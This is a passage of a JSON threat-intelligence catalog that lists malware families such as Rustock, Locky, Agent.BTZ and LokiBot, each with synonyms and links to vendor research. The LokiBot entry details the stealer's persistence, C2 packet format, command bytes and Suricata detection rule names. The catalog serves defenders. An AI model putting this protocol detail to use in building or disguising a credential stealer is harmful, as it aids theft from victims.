"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf",
"value": "Pteranodon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
]
}
},
{
"uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402",
"value": "FormerFirstRAT",
"description": "",
"meta": {
"synonyms": [
"ffrat"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
]
}
},
{
"uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d",
"value": "Rustock",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
"http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
"https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
"https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/",
"http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf",
"https://www.secureworks.com/blog/research-21041",
"http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/"
]
}
},
{
"uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11",
"value": "KINS",
"description": "",
"meta": {
"synonyms": [
"Kasper Internet Non-Security",
"Maple"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://www.youtube.com/watch?v=C-dEOt0GzSE",
"https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
"https://github.com/nyx0/KINS"
]
}
},
{
"uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8",
"value": "Irc16",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/show/?c=5&i=10193&lng=en"
]
}
},
{
"uuid": "51da734c-70dd-4337-ab08-ab61457e0da5",
"value": "Shishiga",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/"
]
}
},
{
"uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"value": "Agent.BTZ",
"description": "",
"meta": {
"synonyms": [
"Sun rootkit",
"ComRAT"
],
"type": [],
"refs": [
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
"https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
"http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
"https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
"https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat"
]
}
},
{
"uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
"value": "Zezin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/siri_urz/status/923479126656323584",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877"
]
}
},
{
"uuid": "272268bb-2715-476b-a121-49142581c559",
"value": "SeDll",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
]
}
},
{
"uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50",
"value": "MrBlack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/?i=5760&c=23&lng=en"
]
}
},
{
"uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e",
"value": "Unidentified 031",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4",
"value": "ThreeByte",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
]
}
},
{
"uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
]
}
},
{
"uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
"value": "FlokiBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/",
"https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
"https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
"https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/",
"http://adelmas.com/blog/flokibot.php",
"http://blog.talosintel.com/2016/12/flokibot-collab.html#more",
"https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/",
"https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/"
]
}
},
{
"uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3",
"value": "Avzhan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/"
]
}
},
{
"uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12",
"value": "Kaiten",
"description": "",
"meta": {
"synonyms": [
"STD"
],
"type": [],
"refs": [
"https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf"
]
}
},
{
"uuid": "af3a3ece-e67f-457a-be72-7651bc720342",
"value": "Evrial",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/"
]
}
},
{
"uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f",
"value": "Revenge RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://isc.sans.edu/diary/rss/22590",
"http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/"
]
}
},
{
"uuid": "6a4365fc-8448-4270-ba93-0341788d004b",
"value": "JenX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/"
]
}
},
{
"uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8",
"value": "NewCore RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
]
}
},
{
"uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e",
"value": "Fanny",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1"
]
}
},
{
"uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82",
"value": "Shurl0ckr",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications"
]
}
},
{
"uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98",
"value": "CryptoShield",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
"http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/"
]
}
},
{
"uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2",
"value": "IoT Reaper",
"description": "",
"meta": {
"synonyms": [
"Reaper",
"IoTroop"
],
"type": [],
"refs": [
"http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
"https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
"https://research.checkpoint.com/new-iot-botnet-storm-coming/",
"https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/"
]
}
},
{
"uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c",
"value": "Locky",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
"https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
"https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
"http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
"https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
"https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
"https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html"
]
}
},
{
"uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
"value": "Cpuminer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/"
]
}
},
{
"uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6",
"value": "Mebromi",
"description": "",
"meta": {
"synonyms": [
"MyBios"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/bios-threat-showing-again",
"https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/",
"http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html",
"http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/"
]
}
},
{
"uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b",
"value": "Maintools.js",
"description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JohnLaTwC/status/915590893155098629"
]
}
},
{
"uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd",
"value": "Floxif",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library"
]
}
},
{
"uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
"value": "Persirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
]
}
},
{
"uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2",
"value": "WildFire",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/"
]
}
},
{
"uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
"value": "Bozok",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
]
}
},
{
"uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
"value": "Rofin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc",
"value": "UDPoS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html",
"https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns"
]
}
},
{
"uuid": "85975621-5126-40cb-8083-55cbfa75121b",
"value": "BankBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
"https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
"http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
"http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
"http://blog.koodous.com/2017/05/bankbot-on-google-play.html"
]
}
},
{
"uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694",
"value": "Skarab Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/11/23/index.html"
]
}
},
{
"uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
"value": "Regin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.youtube.com/watch?v=jeLd-gw2bWo"
]
}
},
{
"uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62",
"value": "HLUX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156",
"value": "WebC2-UGX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f",
"value": "Confucius",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
]
}
},
{
"uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d",
"value": "CyberGate",
"description": "",
"meta": {
"synonyms": [
"Rebhip"
],
"type": [],
"refs": [
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
]
}
},
{
"uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
"value": "LokiBot",
"description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123”.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/R3MRUM/loki-parse",
"http://www.malware-traffic-analysis.net/2017/06/12/index.html",
"https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
"https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
"http://blog.fernandodominguez.me/lokis-antis-analysis/",
"https://phishme.com/loki-bot-malware/",
"https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
"https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
"https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850"
]
}
},
{
"uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
"value": "Bankshot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
"https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/"
]
}
},
{
"uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a",
"value": "Luminosity RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
"https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
"http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
"https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/"
]
}
},
{
"uuid": "b746a645-5974-44db-a811-a024214b7fba",
"value": "running_rat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
]
}
},
{
"uuid": "6a100902-7204-4f20-b838-545ed86d4428",
"value": "WinMM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "4305d59a-0d07-4021-a902-e7996378898b",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
"value": "DirCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/",
"https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf"
]
}
},
{
"uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
"value": "ZeroT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
]
}
},
{
"uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
"value": "RTM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
]
}
},
{
"uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711",
"value": "Dorshel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
"value": "Kazuar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/"
]
}
},
{
"uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
"value": "WebC2-Qbp",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "ac2608e9-7851-409f-b842-e265b877a53c",
"value": "7ev3n",
"description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/",
"https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n"
]
}
},
{
"uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181",
"value": "GooPic Drooper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/"
]
}
},
{
"uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f",
"value": "HttpBrowser",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/"
]
}
},
{
"uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7",
"value": "RawPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite"
]
}
},
{
"uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d",
"value": "OpBlockBuster",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/"
]
}
},
{
"uuid": "d3e16d46-e436-4757-b962-6fd393056415",
"value": "Apocalipto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf"
]
}
},
{
"uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1",
"value": "AdamLocker",
"description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim's system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016",
"https://twitter.com/JaromirHorejsi/status/813712587997249536"
]
}
},
{
"uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
"value": "RokRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
"http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
"https://www.youtube.com/watch?v=uoBQE5s2ba4",
"https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
]
}
},
{
"uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9",
"value": "Viper RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
"https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
]
}
},
{
"uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
"value": "WebC2-Kt3",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "b749ff3a-df68-4b38-91f1-649864eae52c",
"value": "Pirrit",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
"http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
]
}
},
{
"uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2",
"value": "Xaynnalc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/michalmalik/status/846368624147353601"
]
}
},
{
"uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212",
"value": "Conficker",
"description": "",
"meta": {
"synonyms": [
"traffic converter",
"downadup"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2009/05/win32conficker.html"
]
}
},
{
"uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e",
"value": "Acronym",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/"
]
}
},
{
"uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706",
"value": "Credraptor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
]
}
},
{
"uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930",
"value": "Dockster",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html",
"https://www.f-secure.com/weblog/archives/00002466.html"
]
}
},
{
"uuid": "74f8db32-799c-41e5-9815-6272908ede57",
"value": "MS Exchange Tool",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db",
"value": "Darktrack RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
"https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html"
]
}
},
{
"uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef",
"value": "Raxir",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/PhysicalDrive0/statuses/798825019316916224"
]
}
},
{
"uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8",
"value": "Stabuniq",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
